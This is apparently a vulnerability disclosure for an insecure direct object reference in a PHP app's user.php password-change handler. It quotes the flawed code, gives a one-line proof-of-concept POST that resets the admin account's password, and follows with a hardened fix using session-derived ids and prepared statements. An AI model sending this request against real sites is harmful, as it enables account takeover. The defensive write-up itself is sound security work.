Note: The same type of IDOR vuln exists in a lot of other functions in user.php, but password change is most critical.
requests\user.php:
<?php
case 'changep':
    $password = secureEncode($_POST['new_password']);
    if (strlen($password) < 6) {
        echo 'Error - '.$sm['lang'][654]['text'];
        exit;
    }
    $salt = base64_encode($_POST['new_password'].secureEncode($_POST['user']));
    $pswd = crypt($password, $salt);
    // 'user' is taken straight from the POST body and is never compared against the
    // session's own user id, so the caller chooses which row gets the new password.
    $query = "UPDATE users SET pass = '".$pswd."',imported = '' WHERE id = '".secureEncode($_POST['user'])."'";
    $mysqli->query($query);
    break;
The id value in the WHERE clause of the UPDATE query is controlled by user input ($_POST['user']) and is never checked against the authenticated session. Any authenticated user can therefore change the password of the admin (id=1) or of any other user.
An exploit PoC would look something like:

POST /requests/user.php HTTP/1.1

action=changep&user=1&new_password=12345678
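For contrast, below is a hardened version of the same handler. This is an added example, not code from the project: it assumes the authenticated user's id is held in $_SESSION['user_id'], that $mysqli is the open connection used by the original code, and that a role column exists on the users table for the is_admin() helper (all of these are assumptions, not facts from the report). The fix has three parts: the target row is derived from the session rather than from the 'user' parameter (with an explicit, checked branch for administrators), the id is bound in a prepared statement instead of being concatenated into SQL, and the password is stored with password_hash() rather than crypt() with a caller-built salt.

```php
<?php
// Added example, not the project's code: hardened 'changep' handler.
// Assumptions (not from the original report):
//   - $_SESSION['user_id'] holds the authenticated user's id;
//   - $mysqli is an open mysqli connection to the same database;
//   - the users table has a 'role' column used by is_admin().
session_start();

function change_password(mysqli $mysqli, int $actor_id, array $post): string
{
    $new_password = (string) ($post['new_password'] ?? '');
    if (strlen($new_password) < 6) {
        return 'Error - password too short';
    }

    // IDOR fix: the row to update is chosen by the authenticated session,
    // not by the client-supplied 'user' parameter. Only an administrator may
    // name another account, and that is an explicit, checked branch.
    $target_id = $actor_id;
    if (isset($post['user']) && (int) $post['user'] !== $actor_id) {
        if (!is_admin($mysqli, $actor_id)) {
            return 'Error - not permitted to change another user\'s password';
        }
        $target_id = (int) $post['user'];
    }

    // Salted, slow hash; the salt is generated by PHP, not built from input.
    $hash = password_hash($new_password, PASSWORD_DEFAULT);

    // Prepared statement: the id is bound as an integer, never concatenated.
    $stmt = $mysqli->prepare("UPDATE users SET pass = ?, imported = '' WHERE id = ?");
    $stmt->bind_param('si', $hash, $target_id);
    $stmt->execute();
    $changed = $stmt->affected_rows;
    $stmt->close();

    return $changed === 1 ? 'OK' : 'Error - no such user';
}

// Assumed helper (hypothetical): reports whether $id carries the admin role.
function is_admin(mysqli $mysqli, int $id): bool
{
    $stmt = $mysqli->prepare("SELECT role FROM users WHERE id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($role);
    $found = $stmt->fetch();
    $stmt->close();
    return $found && $role === 'admin';
}

switch ($_POST['action'] ?? '') {
    case 'changep':
        if (empty($_SESSION['user_id'])) {
            http_response_code(401);
            exit;
        }
        echo change_password($mysqli, (int) $_SESSION['user_id'], $_POST);
        break;
}
```

With this change the PoC request above (user=1 sent by a non-admin session) is rejected before any query runs, and a request that omits 'user' only ever updates the caller's own row. Verifying the same session-versus-parameter check in the other user.php actions the note mentions is the natural follow-up.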